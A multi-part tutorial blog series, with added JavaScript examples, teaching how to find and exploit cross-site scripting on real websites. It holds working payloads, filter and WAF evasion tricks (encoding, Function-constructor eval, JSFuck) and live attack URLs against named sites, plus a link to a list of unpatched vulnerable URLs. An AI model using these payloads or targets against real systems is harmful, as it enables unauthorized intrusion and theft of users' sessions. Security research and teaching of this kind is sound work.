Let's make a fake XSS PoC on a popular website like www.twitter.com:
Open the JavaScript console and enter alert(document.domain):
Close the console, take a screenshot. Profit :)
Friday, April 3, 2015
XSS In Real World - Part 3 (Inline JavaScript Injection)
Update: You can get the tutorial in PDF format here: 01-04-15_XSS_Tutorial_Korznikov_Alexander.pdf
This is part 3 of XSS in Real World tutorial.
Part 2 of XSS in Real World tutorial
Part 1 of XSS in Real World tutorial
The interesting thing is that this type of injection can be found on popular websites.
Even if tags and the equals character are sanitized, XSS is still possible.
If the website logic (server-side or client-side, it does not matter) reflects user input inside the page's JavaScript, we can use it for nasty purposes :)
Simple example:
We have the URL: http://www.example.com/?id=1&style=blue
1. Parameter "id" is handled by server-side logic, which checks that it is an integer.
2. Parameter "style" is handled by client-side JavaScript and reflected in this context:
site.style = 'blue'
If we pass the string 'blue (with a leading single quote) as the "style" parameter, the context becomes:
site.style = ''blue'
This is no longer valid JavaScript and throws an exception: SyntaxError: unterminated string literal
Model:
\string\trash\string\
'' blue ' //the first two quotes form an empty string; the last quote opens a string that is never closed
If the "id" parameter were handled client-side instead, and reflected in this context:
site.id = 1
the injected payload id=1'trash would become:
site.id = 1'trash
which also throws a SyntaxError.
If our payload is style=blue\ (a trailing backslash):
site.style = 'blue\'
Again a SyntaxError: JavaScript reads \' as an escaped quote, so the string literal is never terminated.
So we can build a noninvasive XSS locator, one that only breaks the syntax of whatever it lands in and executes nothing:
'" >trash\
single quote / double quote / space / greater-than sign / string / backslash
Some contexts this locator will break (assuming no filtering):
HTML code break (the locator closes the href attribute; part of the tail is rendered as tags, the rest is thrown onto the screen as text):
<a href="http://example.com/?id=1&style='" >trash\" style="blablabla">
JavaScript SyntaxErrors (the locator closes the string literal, and the trailing backslash escapes the real closing quote):
var a = "blue'" >trash\'
a=unescape('blue'" >trash\')
var a = 'blue'" >trash\'
Sometimes the website logic escapes ' or " with a backslash. Then try the locator with our own backslashes added, \'\" >trash\ , and you may see:
var a = 'blue\\'\\" >trash\
Our \' arrives as \\': the site prefixed our quote with a backslash, but our own backslash turned that into an escaped backslash (\\), so the quote after it is live again and closes the string.
One more thing to remember: JavaScript applies its arithmetic operators to values of any type, coercing them as needed. 'ale'+'rt' is string concatenation, and 'a' - 'b' or 'a' * 'b' are valid expressions (they evaluate to NaN) whose operands are still evaluated. That lets us glue a function call into a string context without needing a semicolon.
Examples of nasty JavaScript injections with various payloads (the first line is the original, unmodified context):
var a = 'blue'
var a = 'blue' - alert('xss') - '' //alert() is executed; a becomes NaN
var b = ['red','blue',alert('xss'),'']
var c = func('blue'+alert(/xss/))//') //after "//" the rest of the line is a comment, so the original closing ') is ignored
Inline JavaScript Real Demo.
Our second target is www.nbcunicareers.com, XSS report date: 28/06/2014
To make our life easier we will need the FireBug and HackBar Firefox add-ons.
Entering our XSS locator ('">trash\) into the website's "Find Jobs" input field:
takes us to this URL:
http://www.nbcunicareers.com/search-results?search_type=criteria&country=6&state=all&city=all&keywords='">trash\
and in the response we get:
As you can see in FireBug's console, an exception is thrown: SyntaxError: missing } after property list.
Clicking the green URL right after "SyntaxError" opens the generated JavaScript source:
As you can see, on lines 570 and 577 the code is broken:
After the server-side logic, our XSS locator looks like: '&quot;&gt;trash\
So " and > are converted to the HTML entities &quot; and &gt; respectively.
But the single quote is not converted, and that alone breaks the JavaScript code.
Let's test the other characters we need, ( ) and -, with this payload: '-a()-
Looks good: the characters aren't converted and reach the generated JavaScript untouched.
How does JavaScript read this payload? ' closes the string, - subtracts the result of a() from it, and the trailing - joins the remainder of the original string, so the statement stays syntactically valid.
So our final payload is '-alert('XSS')-' and it should not break the generated JavaScript.
pwned again :)
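The following is an added example, not code from the original post and not from nbcunicareers.com or any other site mentioned here. It simulates a value being reflected into a JavaScript string literal (site.style = '<value>') under several constructed server-side escaping policies and shows three things from the text above: the locator '" >trash\ detects the weak policies by breaking the syntax (compilation fails with a SyntaxError), the arithmetic-glue payload '-alert('XSS')-' survives a policy that only entity-encodes " and > (the nbcunicareers case), and a policy that backslash-escapes quotes but not backslashes is still bypassable. The policy names, the hit() function standing in for alert(), and all inputs are assumptions made for the example.

```javascript
// Added example (not the original post's code). hit() stands in for alert();
// the policies and payloads are constructed for illustration.

const LOCATOR = '\'" >trash\\';          // the noninvasive locator: '" >trash\

// Escaping policies a site might apply before reflecting into '<value>'
const policies = {
  none: (s) => s,
  // entity-encode " and > but leave ' and \ alone (the nbcunicareers case)
  entities: (s) => s.replace(/"/g, '&quot;').replace(/>/g, '&gt;'),
  // backslash-escape quotes but forget to escape the backslash itself
  quotesOnly: (s) => s.replace(/'/g, "\\'").replace(/"/g, '\\"'),
  // correct: JSON.stringify escapes \ " and control characters; then escape
  // ' for the single-quoted context, < against </script>, and the line
  // terminators U+2028/2029 that JSON leaves raw
  json: (s) => JSON.stringify(s).slice(1, -1)
    .replace(/'/g, "\\'")
    .replace(/</g, '\\x3c')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029'),
};

// Build the script the page would serve, then try to compile and run it.
// A SyntaxError at compile time is exactly what the locator is looking for.
function reflect(policy, value) {
  const script = `var site = {};\nsite.style = '${policies[policy](value)}';\nreturn site.style;`;
  let fired = false;
  const hit = () => { fired = true; return 0; };
  let fn;
  try {
    fn = new Function('hit', script);
  } catch (e) {
    return { policy, parses: false, error: e.name, fired: false, result: undefined, script };
  }
  const result = fn(hit);
  return { policy, parses: true, error: null, fired, result, script };
}

// Run one payload against every policy
function sweep(value) {
  return Object.fromEntries(Object.keys(policies).map((p) => [p, reflect(p, value)]));
}

if (typeof require !== 'undefined' && require.main === module) {
  // '-hit()-' is the '-alert('XSS')-' payload; \'-hit()// targets quotesOnly
  for (const payload of [LOCATOR, "'-hit()-'", "\\'-hit()//"]) {
    console.log(`payload ${JSON.stringify(payload)}`);
    for (const r of Object.values(sweep(payload))) {
      console.log(`  ${r.policy.padEnd(10)} parses=${r.parses} fired=${r.fired} ${r.error || ''}`);
    }
  }
}
```

Under the three weak policies the locator fails to compile, so a console error is the signal to look for; only the json policy both compiles and returns the locator unchanged. The \'-hit()// payload shows the backslash trick from the text: against quotesOnly the site's added backslash is consumed by ours, the quote closes the literal, hit() runs as an arithmetic operand and the // comment swallows the site's own closing quote.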
That’s all folks!
Like & Share :)
Alexander Korznikov.
Convert any string into HEX \x41\x41 bytes array
A little add-on to the previous blog post: here is a short Python script that converts your input string into a \x00\x00 byte array (every byte becomes a \xNN escape that a JavaScript string literal decodes back):
#!/usr/bin/env python3
import sys

W = '\033[0m'   # reset to normal colour
G = '\033[32m'  # green

if len(sys.argv) < 2:
    print('\n\t%sUsage: string2hex "alert()"%s\n\n\t\tWill output \'\\x61\\x6C\\x65\\x72\\x74\\x28\\x29\'\n' % (G, W))
    sys.exit()

b = sys.argv[1]
# encode to bytes first so non-ASCII input also comes out as one \xNN per byte
print('%s%s%s' % (G, ''.join('\\x%02X' % x for x in b.encode('utf-8')), W))
Example:
root@nopernik:~#
root@nopernik:~# string2hex "<script>alert()</script>"
\x3C\x73\x63\x72\x69\x70\x74\x3E\x61\x6C\x65\x72\x74\x28\x29\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E
XSS In Real World - Part 2 (WAF Filter Evasions)
This is part 2 of XSS in Real World tutorial.
Part 1 of XSS in Real World tutorial
What if the <script> tag is filtered out?
Some WAF evasion cheat-sheets say we can use a mixed-case <sCRipT> tag, but I've never seen that work in the real world, so I don't even try it.
Some variations:
Some variations:
<img src=x onerror=alert()>
<img/src=x onerror="alert()">
<svg onload=alert()>
<svg/onload='alert()'>
<marquee onstart=alert()>
<div style="width:1000px;height:1000px" onmouseover=alert()>asdfa</div>
<a onmouseover=alert()>some random text
What if alert() is filtered?
confirm()
prompt()
window['alert']('xss')
window['ale'+'rt']('xss')
eval(window.atob('YWxlcnQoJ3hzcycp')) //decode the base64 string (alert('xss')) and execute it
eval(window['atob']('YWxlcnQoJ3hzcycp'))
window['e'+'v'+'a'+'l'](window['atob']('YWxlcnQoJ3hzcycp'))
Awesome evasion technique: []["filter"]["constructor"]( CODE )() //[]["filter"] is a function and its constructor is Function, so this is equivalent to eval()
So,
eval('alert()') == []["filter"]["constructor"]( window['atob']('YWxlcnQoJ3hzcycp') )()
And even more evasion:
[]["fil"+"ter"]["constr"+"uctor"]( window['atob']('YWxlcnQoJ3hzcycp') )()
document.body.innerHTML += atob('PHNjcmlwdD5hbGVydCgpPC9zY3JpcHQ+') //decoded base64 == <script>alert()</script>; note that a <script> element inserted through innerHTML is not executed, so in practice append an event-handler payload such as <svg/onload=alert()> instead
Some reference on []() functions:
false => ![]
true => !![]
undefined => [][[]]
NaN => +[![]]
0 => +[]
1 => +!+[]
2 => !+[]+!+[]
10 => [+!+[]]+[+[]]
Array => []
Number => +[]
String => []+[]
Boolean => ![]
Function => []["filter"]
eval => []["filter"]["constructor"]( CODE )()
window => []["filter"]["constructor"]("return this")()
Some security researchers go deeper and develop tools like:
http://www.jsfuck.com/
http://patriciopalladino.com/files/hieroglyphy/
that generate your JavaScript CODE using only the characters []()!+.
[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[]) //the beginning of []["filter"] in this notation (truncated here)
Thanks to Patricio Palladino and Martin Kleppe.
You already understand string manipulation like 'ale'+'rt'...
I'm not going to explain it again :)
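As an added example (not code from the original post, jsfuck.com or hieroglyphy), the following builds the []["filter"]["constructor"] trick from the primitives listed in the reference table above, using only the characters []()!+, and runs the result. The only engine-specific assumption is that String([].filter) reads "function filter() { [native code] }" (true of V8 and SpiderMonkey): the letters c and o, and the space, come from that string, because "false", "true", "undefined" and "NaN" do not contain them. Function names are assumptions of this example.

```javascript
// Added example (not the original post's code). Builds JSFuck-style source
// from the primitives in the table: false = ![], true = !![],
// undefined = [][[]], NaN = +[![]], 0 = +[], 1 = +!+[], n = !+[]+!+[]+...

// Number n as a []()!+ expression
function jsfuckNumber(n) {
  if (n === 0) return '+[]';
  if (n === 1) return '+!+[]';
  return Array(n).fill('!+[]').join('+');   // true+true+... coerces to n
}

// Strings obtainable from primitives, each paired with the expression that yields it
const SOURCES = [
  ['false', '(![]+[])'],
  ['true', '(!![]+[])'],
  ['undefined', '([][[]]+[])'],
  ['NaN', '(+[![]]+[])'],
];

// One character as <source>[<index>], e.g. 'f' -> (![]+[])[+[]]
function jsfuckChar(ch, sources = SOURCES) {
  for (const [word, expr] of sources) {
    const i = word.indexOf(ch);
    if (i !== -1) return `${expr}[${jsfuckNumber(i)}]`;
  }
  throw new Error(`no []()!+ source for character ${JSON.stringify(ch)}`);
}

// A string as a concatenation of single-character expressions
function jsfuckString(s, sources = SOURCES) {
  return [...s].map((c) => jsfuckChar(c, sources)).join('+');
}

// []["filter"]: an Array method, i.e. a Function instance
function jsfuckFilter() {
  return `[][${jsfuckString('filter')}]`;
}

// Stage 2: stringifying []["filter"] yields "function filter() { [native code] }",
// which supplies c, o and the space that the four primitives lack (engine assumption)
function jsfuckSources() {
  const native = String([].filter);
  return [...SOURCES, [native, `(${jsfuckFilter()}+[])`]];
}

// []["filter"]["constructor"] is Function, the eval equivalent from the text
function jsfuckFunctionCtor() {
  return `${jsfuckFilter()}[${jsfuckString('constructor', jsfuckSources())}]`;
}

// Function(code)() with the code itself spelled in []()!+ characters
function jsfuckProgram(code) {
  return `${jsfuckFunctionCtor()}(${jsfuckString(code, jsfuckSources())})()`;
}

function onlyJsfuckChars(src) {
  return /^[\[\]()!+]+$/.test(src);
}

function runJsfuck(code) {
  return new Function(`return (${jsfuckProgram(code)});`)();
}

if (typeof require !== 'undefined' && require.main === module) {
  const prog = jsfuckProgram('return true');
  console.log(`${prog.length} chars, only []()!+: ${onlyJsfuckChars(prog)}`);
  console.log('result:', runJsfuck('return true'));
}
```

The code string handed to Function is limited here to letters harvested from those five strings ("return true" works; an arbitrary payload needs the escape-sequence tricks the real tools add), but the construction of the eval-equivalent itself is the complete one, and it is why a keyword filter on eval, alert or Function cannot stop this family of payloads.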
What if the ( ) characters are filtered?
onerror=alert;throw 'xss' //throw hands the value to the error handler, so alert is called without parentheses
document.body.innerHTML += 'string' appends your string to the end of the <body> element. Note that a <script> element inserted through innerHTML is never executed, so the appended markup has to fire through an event handler, e.g. <svg/onload=...> as in the variations above.
document.body.innerHTML += '<svg/onload=alert\x28\x29>' //in HEX: '\x28' == '(' and '\x29' == ')'; the JavaScript engine decodes the escapes, so the filter never sees the parentheses
Or you can encode the whole string in HEX, for example <script>alert()</script> becomes:
document.body.innerHTML +=
'\x3C\x73\x63\x72\x69\x70\x74\x3E\x61\x6C\x65\x72\x74\x28\x29\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E'
Or just use your XSS as an open redirect:
document.location = 'http://google.com' //open redirect, no parentheses needed
Again, document.location == document['locati'+'on'].
Keep that in mind.
As an additional reference, I recommend reading this paper:
http://dl.packetstormsecurity.net/papers/bypass/WAF_Bypassing_By_RAFAYBALOCH.pdf
Simple HTML injections are easy to sanitize: filter out tags and the '=' character, and finding an XSS becomes a painful job.
For example, Microsoft .NET 4 request validation marks as a Dangerous Request every request containing '<' followed by almost any ASCII character; I've not found a way to evade it, so '<s', '<m' or '</' will all be marked as dangerous.
What remains is attribute injection, '" onmouseover=alert()'>, in case '=' is not filtered out,
or inline JS injection (discussed in the next part).
ModSecurity doesn't know about 'confirm()'...
Some other filters don't handle Unicode (%u) encoding and/or double URL encoding.
If you can't use the 'onload' keyword, try 'onl%u006fad' (decoded to 'onload' by servers that accept %u escapes) or 'onl%256fad' (double-encoded: %25 is '%', so one decode gives 'onl%6fad' and a second gives 'onload').
Or if the '=' character is filtered or marked as dangerous, try 'onload%u003d'.
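The defensive counterpart of the two encoding tricks above, as an added example that is not part of the original post and does not reproduce any WAF product's rules: a request normaliser that decodes %uXXXX and repeated %XX encoding until the value is stable, strips NUL bytes, and lower-cases before matching, compared with matching the raw parameter. The signatures, function names and sample inputs are constructed for this example.

```javascript
// Added example (not the original post's code, not a real WAF's rules).
// Shows why onl%u006fad and onl%256fad slip past a filter that matches raw
// bytes, and why they do not slip past one that normalises first.

// Decode one layer: IIS-style %uXXXX first, then %XX (ASCII-oriented, which
// is enough for the keywords a filter matches)
function decodeOnce(s) {
  return s
    .replace(/%u([0-9a-f]{4})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/%([0-9a-f]{2})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Decode until the value stops changing (bounded, to survive pathological
// input), drop NUL bytes that some back ends discard and that would otherwise
// split a keyword, and lower-case for case-insensitive matching
function normalize(s, maxRounds = 4) {
  let cur = s;
  for (let i = 0; i < maxRounds; i++) {
    const next = decodeOnce(cur);
    if (next === cur) break;
    cur = next;
  }
  return cur.replace(/\0/g, '').toLowerCase();
}

// Illustrative signatures: an event-handler attribute (onxxx=) or a tag start
const HANDLER_RE = /\bon[a-z]+\s*=/;
const TAG_RE = /<\s*\/?\s*[a-z]/;

function looksLikeXss(text) {
  return HANDLER_RE.test(text) || TAG_RE.test(text);
}

// Compare matching the raw parameter with matching the normalised one
function classify(param) {
  const decoded = normalize(param);
  return { raw: looksLikeXss(param), normalized: looksLikeXss(decoded), decoded };
}

// Constructed inputs: attribute-injection payloads as in the .NET case above,
// their encoded variants, a plain tag, and an inline-JS payload
const SAMPLES = [
  '" onmouseover=alert()',
  '" onm%u006fuseover=alert()',
  '" onmouseover%u003dalert()',
  '" onmouse%256fver=alert()',
  '<svg onload=alert()>',
  "'-alert(1)-'",
];

if (typeof require !== 'undefined' && require.main === module) {
  for (const s of SAMPLES) {
    const r = classify(s);
    console.log(`${s.padEnd(30)} raw=${r.raw} normalized=${r.normalized} -> ${r.decoded}`);
  }
}
```

The last sample is the point of the next part: an inline JavaScript injection contains no tag and no handler attribute, so neither the raw nor the normalised matcher sees anything, and only a check that understands the JavaScript string context can catch it.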
Fine. This is over.
In part 3, I will show you a real example of Inline JavaScript injection.
Like & Share :)
Alexander Korznikov.
Thursday, April 2, 2015
XSS In Real World - Part 1 (Simple XSS)
Hi there, in this tutorial series I will try to explain how to find XSS in the real world, using some interesting techniques.
All of you know that XSS is based on some kind of code injection. It may be a <script> tag injection, or just an '-alert()-' inside a JavaScript string; I will explain that later.
What do you need to find an XSS? Simply a browser. But if you want to make your life easier and find it much faster, you may use this software:
- Firefox Browser
- FireBug Add-on
- HackBar Add-on
- Google.
There are tons of verified XSSs published by lots of security researchers, affecting VIP sites too.
A VIP website on xssposed.org is one with Google PR > 6 or Alexa rank < 50000.
So I wrote a script that grabbed all xssposed.org XSS URLs and started to filter out the uninteresting fields.
There were about 7500 URLs.
You can download the list from here: https://ghostbin.com/paste/n6vk7/raw and filter out all you don't need.
Real XSS (HTML Injection) Demo.
I will take real examples of XSSs from xssposed.org that were not patched for a very, very long time.
Our first target is www.tcdb.org, XSS report dated 14/06/2008.
Since that date, the same XSS has been reported 3 more times.
Take a look at the "search" field. Let's enter some RANDOMSTRING inside an <xxx> tag. The purpose of this test is to check whether there is any user input sanitation:
<xxx>RANDOMSTRING<xxx>
In the output, we see our "RANDOMSTRING" without the <xxx> tags (the browser renders an unknown tag as nothing).
Let's take a look at the source: // CTRL+U in Firefox and Chrome
As you can see, there is no filtering, and our <xxx> tag was passed to the browser as HTML.
The purple color in the source view means that <xxx> was interpreted as a tag.
Finally, we enter:
<script>alert(document.domain)</script>
One thing you should notice: there are no GET parameters in the URL. In this example POST was used.
Open the HackBar add-on in Firefox and, once you are on the search results page, press Load URL and tick the checkbox Enable Post data.
Some server-side scripts handle GET and POST requests the same way.
Let's check it:
http://www.tcdb.org/search/index.php?query=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
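The probe-and-classify step above as an added example (not code from the original post or from tcdb.org): it builds the canary probe, decides from the response body whether the tag came back raw, entity-encoded, stripped or not at all, and builds the GET form of the request for the "same handler for GET and POST" check. The response bodies are constructed here to stand in for what a site can do with the probe; function names are assumptions of this example.

```javascript
// Added example (not the original post's code). Sample responses are
// constructed; only the URL builder reproduces a request from the text.

function makeProbe(canary) {
  return `<xxx>${canary}</xxx>`;   // unknown tag: harmless if rendered, visible in the source
}

function htmlEncode(s) {
  return s.replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

// raw:      the tag reached the browser unencoded -> HTML injection, go for a payload
// encoded:  the tag was entity-encoded -> the HTML context is safe, try other contexts
// stripped: tags removed but the text kept -> a filter is present, try attribute/JS contexts
// absent:   not reflected at all
function classifyReflection(html, canary) {
  const probe = makeProbe(canary);
  if (html.includes(probe)) return 'raw';
  if (html.includes(htmlEncode(probe))) return 'encoded';
  if (html.includes(canary)) return 'stripped';
  return 'absent';
}

// When the handler treats GET and POST alike, the POST field can go on the
// query string; URLSearchParams applies the form encoding (%3C, %28, ...)
function buildGetUrl(base, param, value) {
  const qs = new URLSearchParams({ [param]: value }).toString();
  return `${base}?${qs}`;
}

// Constructed sample responses for the canary RANDOMSTRING
const RESPONSES = {
  raw: '<p>Results for: <xxx>RANDOMSTRING</xxx></p>',
  encoded: '<p>Results for: &lt;xxx&gt;RANDOMSTRING&lt;/xxx&gt;</p>',
  stripped: '<p>Results for: RANDOMSTRING</p>',
  absent: '<p>No results.</p>',
};

if (typeof require !== 'undefined' && require.main === module) {
  for (const [name, body] of Object.entries(RESPONSES)) {
    console.log(`${name.padEnd(9)} -> ${classifyReflection(body, 'RANDOMSTRING')}`);
  }
  console.log(buildGetUrl('http://www.tcdb.org/search/index.php', 'query',
    '<script>alert(document.domain)</script>'));
}
```

Use a fresh random canary per request so the classification cannot be fooled by the word appearing elsewhere on the page.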
In the next part we will discuss WAF filter evasions.
Like & Share :)
Alexander Korznikov.
Awesome XSS on FOXNEWS.COM
https://www.xssposed.org/incidents/55933/
http://www.foxnews.com/search-results/search?q=',document.body.inn%00erHTML+='\x3C\x73\x76\x67\x2F\x6F\x6E\x6C\x6F\x61\x64\x3D\x61\x6C\x65\x72\x74\x28\x2F\x78\x73\x73\x70\x6F\x73\x65\x64\x2F\x29\x3E','&submit=Search&ss=fn